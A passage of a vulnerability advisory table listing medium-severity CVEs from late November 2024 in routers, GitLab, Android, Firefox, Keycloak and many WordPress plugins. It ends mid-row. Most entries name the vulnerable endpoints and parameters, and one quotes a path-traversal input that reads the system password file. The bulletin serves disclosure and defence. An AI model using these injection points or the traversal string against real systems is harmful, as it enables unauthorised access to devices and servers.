A vulnerability classified as critical has been found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. This affects an unknown part of the file /admin/network/diag_traceroute6. The manipulation of the argument diag_traceroute6 leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-25 | 4.7 | CVE-2024-11654 |
| EnGenius--ENH1350EXT |
A vulnerability classified as critical was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. This vulnerability affects unknown code of the file /admin/network/diag_pinginterface. The manipulation of the argument diag_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-25 | 4.7 | CVE-2024-11655 |
| EnGenius--ENH1350EXT |
A vulnerability, which was classified as critical, has been found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. This issue affects some unknown processing of the file /admin/network/diag_ping6. The manipulation of the argument diag_ping6 leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-25 | 4.7 | CVE-2024-11656 |
| EnGenius--ENH1350EXT |
A vulnerability, which was classified as critical, was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118. Affected is an unknown function of the file /admin/network/diag_nslookup. The manipulation of the argument diag_nslookup leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-25 | 4.7 | CVE-2024-11657 |
| EnGenius--ENH1350EXT |
A vulnerability has been found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/network/ajax_getChannelList. The manipulation of the argument countryCode leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-25 | 4.7 | CVE-2024-11658 |
| EnGenius--ENH1350EXT |
A vulnerability was found in EnGenius ENH1350EXT, ENS500-AC and ENS620EXT up to 20241118 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/network/diag_iperf. The manipulation of the argument iperf leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-25 | 4.7 | CVE-2024-11659 |
| Fintelligence--Fintelligence Calculator |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fintelligence Fintelligence Calculator allows Stored XSS.This issue affects Fintelligence Calculator: from n/a through 1.0.3. | 2024-11-28 | 6.5 | CVE-2024-53731 |
| FlickDevs--Countdown Timer for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FlickDevs Countdown Timer for Elementor allows Stored XSS.This issue affects Countdown Timer for Elementor: from n/a through 1.3.6. | 2024-12-01 | 6.5 | CVE-2024-53743 |
| FlickDevs--Elementor Button Plus |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FlickDevs Elementor Button Plus allows Stored XSS.This issue affects Elementor Button Plus: from n/a through 1.3.3. | 2024-12-01 | 6.5 | CVE-2024-53746 |
| Gabe Livan--Asset CleanUp: Page Speed Booster |
Server-Side Request Forgery (SSRF) vulnerability in Gabe Livan Asset CleanUp: Page Speed Booster allows Server Side Request Forgery.This issue affects Asset CleanUp: Page Speed Booster: from n/a through 1.3.9.8. | 2024-11-30 | 4.4 | CVE-2024-53738 |
| GitLab--GitLab |
An issue was discovered in GitLab CE/EE affecting all versions from 16.9.8 before 17.4.5, 17.5 before 17.5.3, and 17.6 before 17.6.1. Certain API endpoints could potentially allow unauthorized access to sensitive data due to overly broad application of token scopes. | 2024-11-26 | 6.5 | CVE-2024-11669 |
| GitLab--GitLab |
A Denial of Service (DoS) issue has been discovered in GitLab CE/EE affecting all versions prior to 12.6 prior to 17.4.5, 17.5 prior to 17.5.3, and 17.6 prior to 17.6.1. An attacker could cause a denial of service with a crafted cargo.toml file. | 2024-11-26 | 6.5 | CVE-2024-8237 |
| GitLab--GitLab |
An issue has been discovered in GitLab EE affecting all versions starting from 17.3 before 17.3.7, all versions starting from 17.4 before 17.4.4, all versions starting from 17.5 before 17.5.2 in which an unauthenticated user may be able to read some information about an MR in a private project, under certain circumstances. | 2024-11-26 | 5.3 | CVE-2024-10240 |
| GitLab--GitLab |
An issue was discovered in GitLab CE/EE affecting all versions starting from 15.6 prior to 17.4.5, starting from 17.5 prior to 17.5.3, starting from 17.6 prior to 17.6.1 which could cause Denial of Service via integrating a malicious harbor registry. | 2024-11-26 | 5.3 | CVE-2024-8177 |
| GitLab--GitLab |
An issue has been discovered in GitLab CE/EE affecting all versions from 16.11 before 17.4.5, 17.5 before 17.5.3, and 17.6 before 17.6.1. Long-lived connections could potentially bypass authentication controls, allowing unauthorized access to streaming results. | 2024-11-26 | 4.2 | CVE-2024-11668 |
| GitLab--GitLab |
A denial of service (DoS) condition was discovered in GitLab CE/EE affecting all versions from 13.2.4 before 17.4.5, 17.5 before 17.5.3, and 17.6 before 17.6.1. By leveraging this vulnerability an attacker could create a DoS condition by sending crafted API calls. This was a regression of an earlier patch. | 2024-11-26 | 4.3 | CVE-2024-11828 |
| Google--Android |
In impeg2d_bit_stream_flush() of libmpeg2dec there is a possible OOB read due to a missing bounds check. This could lead to Remote DoS with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-27 | 6.5 | CVE-2017-13320 |
| Google--Android |
In SensorService::isDataInjectionEnabled of frameworks/native/services/sensorservice/SensorService.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-27 | 6.2 | CVE-2017-13321 |
| Google--Android |
In mv_err_cost of mcomp.c there is a possible out of bounds read due to missing bounds check. This could lead to denial of service with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-27 | 6.5 | CVE-2018-9349 |
| Google--Android |
In ih264d_assign_pic_num of ih264d_utils.c there is a possible out of bound read due to missing bounds check. This could lead to a denial of service with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-27 | 6.5 | CVE-2018-9350 |
| Google--Android |
In ih264e_fmt_conv_420p_to_420sp of ih264e_fmt_conv.c there is a possible out of bound read due to missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-27 | 6.5 | CVE-2018-9351 |
| Google--Android |
In ihevcd_allocate_dynamic_bufs of ihevcd_api.c there is a possible resource exhaustion due to integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-27 | 6.5 | CVE-2018-9352 |
| Google--Android |
In ihevcd_parse_slice_data of ihevcd_parse_slice.c there is a possible heap buffer out of bound read due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-27 | 6.5 | CVE-2018-9353 |
| Google--Android |
In VideoFrameScheduler.cpp of VideoFrameScheduler::PLL::fit, there is a possible remote denial of service due to divide by 0. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-27 | 6.5 | CVE-2018-9354 |
| Google--Android |
In BnAudioPolicyService::onTransact of IAudioPolicyService.cpp, there is a possible information disclosure due to uninitialized data. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-28 | 6.2 | CVE-2018-9377 |
| Google--Chrome |
Insufficient data validation in Mojo in Google Chrome prior to 129.0.6668.89 allowed a remote attacker who had compromised the renderer process to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High) | 2024-11-27 | 5.5 | CVE-2024-9369 |
| Guangzhou Huayi Intelligent Technology--Jeewms |
A vulnerability was found in Guangzhou Huayi Intelligent Technology Jeewms 3.7. It has been rated as problematic. This issue affects the function preHandle of the file src/main/java/com/zzjee/wm/controller/WmOmNoticeHController.java. The manipulation of the argument request leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-28 | 5.3 | CVE-2024-11961 |
| heateor--Social Sharing Plugin Sassy Social Share |
The Social Sharing Plugin - Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the heateor_mastodon_share parameter in all versions up to, and including, 3.3.69 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-30 | 6.1 | CVE-2024-11252 |
| Hitachi Energy--NSD570 Teleprotection Equipment |
A vulnerability exists in NSD570 login panel that does not restrict excessive authentication attempts. If exploited, this could cause account takeover and unauthorized access to the system when an attacker conducts brute-force attacks against the equipment login. Note that the system supports only one concurrent session and implements a delay of more than a second between failed login attempts making it difficult to automate the attacks. | 2024-11-26 | 5.3 | CVE-2024-9928 |
| Hitachi Energy--NSD570 Teleprotection Equipment |
A vulnerability exists in NSD570 that allows any authenticated user to access all device logs disclosing login information with timestamps. | 2024-11-26 | 4.3 | CVE-2024-9929 |
| IBM--Jazz Foundation |
IBM Jazz Foundation 7.0.2 and below are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2024-11-25 | 6.1 | CVE-2023-45181 |
| IBM--Jazz Foundation |
IBM Jazz Foundation 7.0.2 and 7.0.3 could allow a user to change their dashboard using a specially crafted HTTP request due to improper access control. | 2024-11-25 | 5.3 | CVE-2023-26280 |
| IBM--Workload Scheduler |
IBM Workload Scheduler 9.5, 10.1, and 10.2 stores user credentials in plain text which can be read by a local user. | 2024-11-26 | 5.5 | CVE-2024-49351 |
| IDE Interactive--Content Audit Exporter |
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in IDE Interactive Content Audit Exporter allows Retrieve Embedded Sensitive Data.This issue affects Content Audit Exporter: from n/a through 1.1. | 2024-11-30 | 5.3 | CVE-2024-53768 |
| intellasoftsolutions--SEO Landing Page Generator |
The SEO Landing Page Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.66.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-28 | 6.1 | CVE-2024-11366 |
| iseardmedia--Kudos Donations Easy donations and payments with Mollie |
The Kudos Donations - Easy donations and payments with Mollie plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 3.2.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-28 | 6.1 | CVE-2024-11684 |
| iseardmedia--Kudos Donations Easy donations and payments with Mollie |
The `Kudos Donations - Easy donations and payments with Mollie` plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of `add_query_arg` without appropriate escaping on the URL in all versions up to, and including, 3.2.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute if they can successfully trick a user into performing an action, such as clicking on a specially crafted link. | 2024-11-28 | 6.1 | CVE-2024-11685 |
| jegtheme--Jeg Elementor Kit |
The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's JKit - Countdown widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-26 | 6.4 | CVE-2024-10308 |
| jegtheme--Jeg Elementor Kit |
The Jeg Elementor Kit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.9 via the render_content function in class/elements/views/class-tabs-view.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. | 2024-11-26 | 4.3 | CVE-2024-8899 |
| Jenkins Project--Jenkins Filesystem List Parameter Plugin |
Jenkins Filesystem List Parameter Plugin 0.0.14 and earlier does not restrict the path used for the File system objects list Parameter, allowing attackers with Item/Configure permission to enumerate file names on the Jenkins controller file system. | 2024-11-27 | 4.3 | CVE-2024-54004 |
| jonkastonka--Sp*tify Play Button for WordPress |
The Spotify Play Button for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's spotifyplaybutton shortcode in all versions up to, and including, 2.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-26 | 6.4 | CVE-2024-11192 |
| labibahmed42--Pricing Tables For WPBakery Page Builder (formerly Visual Composer) |
The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wdo_pricing_tables shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-27 | 6.4 | CVE-2024-10175 |
| labsai--EDDI |
E.D.D.I (Enhanced Dialog Driven Interface) is a middleware to connect and manage LLM API bots. A path traversal vulnerability exists in the backup export functionality of EDDI, as implemented in `RestExportService.java`. This vulnerability allows an attacker to access sensitive files on the server by manipulating the `botFilename` parameter in requests. The application fails to sanitize user input, enabling malicious inputs such as `..%2f..%2fetc%2fpasswd` to access arbitrary files. However, the **severity of this vulnerability is significantly limited** because EDDI typically runs within a **Docker container**, which provides additional layers of isolation and restricted permissions. As a result, while this vulnerability exposes files within the container, it does not inherently threaten the underlying host system or other containers. A patch is required to sanitize and validate the botFilename input parameter. Users should ensure they are using version 5.4 which contains this patdch. For temporary mitigation, access to the vulnerable endpoint should be restricted through firewall rules or authentication mechanisms. | 2024-11-26 | 6.3 | CVE-2024-53844 |
| legalweb--LegalWeb Cloud |
The LegalWeb Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'legalweb-popup' shortcode in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-28 | 6.4 | CVE-2024-11761 |
| logichunt--Counter Up Animated Number Counter & Milestone Showcase |
The Counter Up - Animated Number Counter & Milestone Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lgx-counter' shortcode in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-27 | 6.4 | CVE-2024-10895 |
| man4toman--Parsi Date |
The Parsi Date plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-26 | 6.1 | CVE-2024-11032 |
| Mozilla--Firefox for iOS |
Accessing a non-secure HTTP site that uses a non-existent port may cause the SSL padlock icon in the location URL bar to, misleadingly, appear secure. This vulnerability affects Firefox for iOS < 133. | 2024-11-26 | 5.4 | CVE-2024-53975 |
| Mozilla--Firefox for iOS |
Under certain circumstances, navigating to a webpage would result in the address missing from the location URL bar, making it unclear what the URL was for the loaded webpage. This vulnerability affects Firefox for iOS < 133. | 2024-11-26 | 5.4 | CVE-2024-53976 |
| Mozilla--Firefox |
Enhanced Tracking Protection's Strict mode may have inadvertently allowed a CSP `frame-src` bypass and DOM-based XSS through the Google SafeFrame shim in the Web Compatibility extension. This issue could have exposed users to malicious frames masquerading as legitimate content. This vulnerability affects Firefox < 133, Firefox ESR < 128.5, Firefox ESR < 115.18, Thunderbird < 133, and Thunderbird < 128.5. | 2024-11-26 | 6.1 | CVE-2024-11694 |
| Mozilla--Firefox |
A null pointer dereference may have inadvertently occurred in `pk12util`, and specifically in the `SEC_ASN1DecodeItem_Util` function, when handling malformed or improperly formatted input files. This vulnerability affects Firefox < 133 and Thunderbird < 133. | 2024-11-26 | 6.5 | CVE-2024-11706 |
| Mozilla--Firefox |
Missing thread synchronization primitives could have led to a data race on members of the PlaybackParams structure. This vulnerability affects Firefox < 133 and Thunderbird < 133. | 2024-11-26 | 6.5 | CVE-2024-11708 |
| Mozilla--Firefox |
A crafted URL containing Arabic script and whitespace characters could have hidden the true origin of the page, resulting in a potential spoofing attack. This vulnerability affects Firefox < 133, Firefox ESR < 128.5, Thunderbird < 133, and Thunderbird < 128.5. | 2024-11-26 | 5.4 | CVE-2024-11695 |
| Mozilla--Firefox |
An attacker could cause a select dropdown to be shown over another tab; this could have led to user confusion and possible spoofing attacks. This vulnerability affects Firefox < 133, Firefox ESR < 128.5, Thunderbird < 133, and Thunderbird < 128.5. | 2024-11-26 | 4.3 | CVE-2024-11692 |
| Mozilla--Firefox |
The incorrect domain may have been displayed in the address bar during an interrupted navigation attempt. This could have led to user confusion and possible spoofing attacks. This vulnerability affects Firefox < 133 and Thunderbird < 133. | 2024-11-26 | 4.3 | CVE-2024-11701 |
| Mozilla--Nunjucks |
In Nunjucks versions prior to version 3.2.4, it was possible to bypass the restrictions which are provided by the autoescape functionality. If there are two user-controlled parameters on the same line used in the views, it was possible to inject cross site scripting payloads using the backslash \ character. | 2024-11-26 | 6.1 | CVE-2023-2142 |
| n/a--n/a |
pyspider through 0.3.10 allows /update XSS. NOTE: This vulnerability only affects products that are no longer supported by the maintainer | 2024-11-29 | 6.1 | CVE-2024-39162 |
| n/a--n/a |
Local File Inclusion (LFI) vulnerability has been discovered in TCPDF 6.7.5. This vulnerability enables a user to read arbitrary files from the server's file system through <img> src tag, potentially exposing sensitive information. | 2024-11-26 | 6.2 | CVE-2024-51058 |
| n/a--n/a |
An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component. | 2024-11-27 | 6.8 | CVE-2024-51228 |
| n/a--n/a |
An Open Redirect vulnerability in Taiga v6.8.1 allows attackers to redirect users to arbitrary websites via appending a crafted link to /login?next= in the login page URL. | 2024-11-25 | 6.1 | CVE-2024-53556 |
| n/a--n/a |
masterstack_imgcap v0.0.1 was discovered to contain a SQL injection vulnerability via the endpoint /submit. | 2024-11-25 | 6.3 | CVE-2024-53597 |
| n/a--n/a |
An authenticated arbitrary file upload vulnerability in the Documents module of SPIP v4.3.3 allows attackers to execute arbitrary code via uploading a crafted PDF file. | 2024-11-26 | 6.3 | CVE-2024-53619 |
| n/a--n/a |
Backdrop CMS before 1.28.4 and 1.29.x before 1.29.2 allows XSS via an SVG document, if the SVG tag is allowed for a text format. | 2024-11-29 | 6.1 | CVE-2024-54123 |
| n/a--n/a |
In FFmpeg version n6.1.1, specifically within the avcodec/speexdec.c module, a potential security vulnerability exists due to insufficient validation of certain parameters when parsing Speex codec extradata. This vulnerability could lead to integer overflow conditions, potentially resulting in undefined behavior or crashes during the decoding process. | 2024-11-29 | 5.5 | CVE-2024-35369 |
| n/a--n/a |
FFmpeg n6.1.1 has a vulnerability in the WAVARC decoder of the libavcodec library which allows for an integer overflow when handling certain block types, leading to a denial-of-service (DoS) condition. | 2024-11-29 | 5.3 | CVE-2024-36619 |
| n/a--n/a |
Zulip 8.3 is vulnerable to Cross Site Scripting (XSS) via the construct_copy_div function in copy_and_paste.js. | 2024-11-29 | 5.4 | CVE-2024-36624 |
| n/a--n/a |
Zulip 8.3 is vulnerable to Cross Site Scripting (XSS) via the replace_emoji_with_text function in ui_util.ts. | 2024-11-29 | 5.4 | CVE-2024-36625 |
| n/a--n/a |
In prestashop 8.1.4, a NULL pointer dereference was identified in the math_round function within Tools.php. | 2024-11-29 | 5.3 | CVE-2024-36626 |
| n/a--n/a |
WithSecure Elements Agent for Mac before 24.3, MDR before 24.3, and Elements Client Security for Mac before 16.10 allow a remote Denial of Service. | 2024-11-29 | 5.5 | CVE-2024-47193 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability was identified in PHPGURUKUL Vehicle Parking Management System v1.13 in /users/profile.php. This vulnerability allows authenticated users to inject malicious XSS scripts into the profile name field. | 2024-11-26 | 5.4 | CVE-2024-53365 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in the /scroll.php endpoint of LafeLabs Chaos v0.0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2024-11-25 | 5.4 | CVE-2024-53599 |
| n/a--n/a |
WikiDocs before 1.0.65 allows stored XSS by authenticated users via data that comes after $$\\, which is mishandled by a KaTeX parser. | 2024-11-25 | 5.4 | CVE-2024-53930 |
| n/a--n/a |
Quectel EC25-EUX EC25EUXGAR08A05M1G was discovered to contain a stack overflow. | 2024-11-27 | 4.2 | CVE-2024-37816 |
| n/a--n/a |
OpenVidReview 1.0 is vulnerable to Cross Site Scripting (XSS) in review names. | 2024-11-27 | 4.8 | CVE-2024-46055 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in the Article module of SPIP v4.3.3 allows authenticated attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Title parameter. | 2024-11-26 | 4.8 | CVE-2024-53620 |
| n/a--n/a |
A Reflected Cross Site Scripting (XSS) vulnerability was found in /covid-tms/patient-search-report.php in PHPGurukul COVID 19 Testing Management System v1.0, which allows remote attackers to execute arbitrary code via the searchdata POST request parameter. | 2024-11-27 | 4.8 | CVE-2024-53635 |
| n/a--n/a |
stalld through 1.19.7 allows local users to cause a denial of service (file overwrite) via a /tmp/rtthrottle symlink attack. | 2024-11-29 | 4.1 | CVE-2024-54159 |
| NEC Corporation--UNIVERGE IX |
Cross-site request forgery (CSRF) vulnerability in NEC Corporation UNIVERGE IX from Ver9.2 to Ver10.10.21, for Ver10.8 up to Ver10.8.27 and for Ver10.9 up to Ver10.9.14 allows a attacker to hijack the authentication of screens on the device via the management interface. | 2024-11-29 | 4.3 | CVE-2024-11014 |
| NetWin--SurgeMail |
A Cross-Site Scripting (XSS) vulnerability in SurgeMail v78c2 could allow an attacker to execute arbitrary JavaScript code via an elaborate payload injected into vulnerable parameters. | 2024-11-29 | 4.6 | CVE-2024-11990 |
| nicheaddons--Primary Addon for Elementor |
The Primary Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.6.2 via the [prim_elementor_template] shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to. | 2024-11-28 | 4.3 | CVE-2024-10670 |
| nicheaddons--Restaurant & Cafe Addon for Elementor |
The Restaurant & Cafe Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.5.9 via the 'narestaurant_elementor_template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. | 2024-11-28 | 4.3 | CVE-2024-10780 |
| NuttTaro--Video Player for WPBakery |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NuttTaro Video Player for WPBakery allows Stored XSS.This issue affects Video Player for WPBakery: from n/a through 1.0.1. | 2024-12-01 | 6.5 | CVE-2024-53747 |
| pagup--Internal Linking for SEO traffic & Ranking Auto internal links (100% automatic) |
The Internal Linking for SEO traffic & Ranking - Auto internal links (100% automatic) plugin for WordPress is vulnerable to time-based SQL Injection via the 'post_id' parameter in all versions up to, and including, 1.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-11-27 | 4.9 | CVE-2024-11009 |
| PickPlugins--Mail Picker |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Mail Picker allows DOM-Based XSS.This issue affects Mail Picker: from n/a through 1.0.14. | 2024-11-30 | 6.5 | CVE-2024-53772 |
| Pixobe--Pixobe Cartography |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pixobe Pixobe Cartography allows DOM-Based XSS.This issue affects Pixobe Cartography: from n/a through 1.0.1. | 2024-11-30 | 6.5 | CVE-2024-53767 |
| pluggabl--Booster for WooCommerce |
The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wcj_product_meta shortcode in all versions up to, and including, 7.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with ShopManager-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-26 | 5.5 | CVE-2024-9170 |
| Plugin Devs--Post Carousel Slider for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Plugin Devs Post Carousel Slider for Elementor allows Stored XSS.This issue affects Post Carousel Slider for Elementor: from n/a through 1.4.0. | 2024-12-01 | 6.5 | CVE-2024-53749 |
| Portfoliohub--WordPress Portfolio Builder Portfolio Gallery |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Portfoliohub WordPress Portfolio Builder - Portfolio Gallery allows Stored XSS.This issue affects WordPress Portfolio Builder - Portfolio Gallery: from n/a through 1.1.7. | 2024-11-30 | 5.9 | CVE-2024-53788 |
| Praca.pl sp. z o.o.--Znajd Prac z Praca.pl |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Praca.Pl sp. Z o.O. Znajdź Pracę z Praca.Pl allows DOM-Based XSS.This issue affects Znajdź Pracę z Praca.Pl: from n/a through 2.2.3. | 2024-11-30 | 6.5 | CVE-2024-53773 |
| r00tsector--HLS Player |
The HLS Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hls_player' shortcode in all versions up to, and including, 1.0.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-28 | 6.4 | CVE-2024-11333 |
| ragicsupport--Ragic Shortcode |
The Ragic Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ragic' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-28 | 6.4 | CVE-2024-11431 |
| realmag777--InPost Gallery |
The The InPost Gallery plugin for WordPress is vulnerable to arbitrary shortcode execution via the inpost_gallery_get_shortcode_template AJAX action in all versions up to, and including, 2.1.4.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. | 2024-11-26 | 6.3 | CVE-2024-11002 |
| Red Hat--Red Hat Ansible Automation Platform 2 |
A vulnerability was found in the Ansible Automation Platform (AAP). This flaw allows attackers to escalate privileges by improperly leveraging read-scoped OAuth2 tokens to gain write access. This issue affects API endpoints that rely on ansible_base.oauth2_provider for OAuth2 authentication. While the impact is limited to actions within the user's assigned permissions, it undermines scoped access controls, potentially allowing unintended modifications in the application and consuming services. | 2024-11-25 | 5 | CVE-2024-11483 |
| Red Hat--Red Hat build of Keycloak 24 |
A vulnerability was found in the Keycloak-services package. If untrusted data is passed to the SearchQueryUtils method, it could lead to a denial of service (DoS) scenario by exhausting system resources due to a Regex complexity. | 2024-11-25 | 6.5 | CVE-2024-10270 |
| Red Hat--Red Hat build of Keycloak 24 |
A flaw was found in Keycloak. This issue occurs because sensitive runtime values, such as passwords, may be captured during the Keycloak build process and embedded as default values in bytecode, leading to unintended information disclosure. In Keycloak 26, sensitive data specified directly in environment variables during the build process is also stored as a default values, making it accessible during runtime. Indirect usage of environment variables for SPI options and Quarkus properties is also vulnerable due to unconditional expansion by PropertyMapper logic, capturing sensitive data as default values in all Keycloak versions up to 26.0.2. | 2024-11-25 | 5.9 | CVE-2024-10451 |
| Red Hat--Red Hat build of Keycloak 24 |
A vulnerability was found in the Keycloak Server. The Keycloak Server is vulnerable to a denial of service (DoS) attack due to improper handling of proxy headers. When Keycloak is configured to accept incoming proxy headers, it may accept non-IP values, such as obfuscated identifiers, without proper validation. This issue can lead to costly DNS resolution operations, which an attacker could exploit to tie up IO threads and potentially cause a denial of service. The attacker must have access to send requests to a Keycloak instance that is configured to accept proxy headers, specifically when reverse proxies do not overwrite incoming headers, and Keycloak is configured to trust these headers. | 2024-11-25 | 4.7 | CVE-2024-9666 |
| Red Hat--Red Hat Enterprise Linux 7 Extended Lifecycle Support |
A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations. | 2024-11-26 | 5.5 | CVE-2024-52337 |
| Red Hat--Red Hat OpenShift Container Platform 4 |
